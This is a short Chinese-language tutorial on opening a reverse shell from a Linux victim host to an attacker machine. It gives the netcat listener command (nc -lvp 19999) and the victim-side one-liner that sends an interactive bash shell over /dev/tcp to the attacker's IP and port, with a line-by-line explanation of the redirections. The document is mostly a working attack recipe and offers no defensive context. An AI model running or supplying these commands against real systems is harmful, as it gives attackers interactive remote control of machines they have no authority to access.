用bash反弹shell

受害主机；linux系统

攻击机：需要安装netcat（nc）

受害主机执行：ifconfig  ## 查看受害主机ip

攻击机执行：nc -lvp 19999 ## 在攻击机监听19999端口

受害主机执行：bash -i &> /dev/tcp/[攻击机ip]/[攻击机监听端口] 0>&1  ##反弹shell，bash是linux shell的一种，-i是指创建一个交互式的shell，&>是指将正确错误的输入输出都输到文件里，不显示在终端，/dev/tcp 是linux中的一个特殊文件: /dev/tcp ,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据，0>&1 的意思是将标准输入重定向到标准输出

 攻击机得到反弹的shell